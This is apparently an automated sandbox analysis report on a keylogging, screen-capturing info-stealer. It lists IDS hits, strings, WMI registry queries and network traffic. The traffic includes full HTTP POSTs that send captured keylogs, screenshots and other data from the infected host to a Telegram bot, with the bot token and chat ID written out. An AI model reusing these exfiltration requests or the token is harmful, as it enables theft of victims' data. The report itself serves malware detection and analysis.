                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 162.55.60.2:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49749 -> 162.55.60.2:80
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 18469Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2812Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 4132Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2449Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2515Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
                    Source: global trafficDNS traffic detected: DNS query: showip.net
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 18469Connection: Keep-AliveCache-Control: no-cache
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: XgbXowhljC.exe, 0000000B.00000002.2291217651.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/e-
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/.
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/0
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/8
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/Z
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/api.telegram.org
                    Source: oS6KsQIqJxe038Y.exe, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=t
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407510611.0000000004010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/mplates
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/ocUnique
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drString found in binary or memory: https://www.mgm.gov.tr/?il=manisa
                    Source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drString found in binary or memory: https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmb
                    Source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drString found in binary or memory: https://www.trtworld.com/#frmActiveBrowsers
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF91808 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0BF91808
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF917F8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0BF917F8

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Writes or reads registry keys via WMI
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_013342040_2_01334204
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133DFB40_2_0133DFB4
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_013370380_2_01337038
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_072645A00_2_072645A0
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_072600400_2_07260040
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_072645900_2_07264590
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B61CEE90_2_0B61CEE9
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B6116A00_2_0B6116A0
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B6194B80_2_0B6194B8
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B61A1370_2_0B61A137
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B6194B80_2_0B6194B8
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B61CEE90_2_0B61CEE9
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B6145280_2_0B614528
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF901580_2_0BF90158
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF95E680_2_0BF95E68
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 10_2_00401E0810_2_00401E08
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_0100420411_2_01004204
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_0100703811_2_01007038
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_0100DFB411_2_0100DFB4
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057FC96811_2_057FC968
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057F77C811_2_057F77C8
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057F678811_2_057F6788
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057F635011_2_057F6350
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057F5F1811_2_057F5F18
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057F7E6011_2_057F7E60
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 14_2_0042BFE014_2_0042BFE0
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000000.2158930422.0000000000872000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2262162554.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs oS6KsQIqJxe038Y.exe
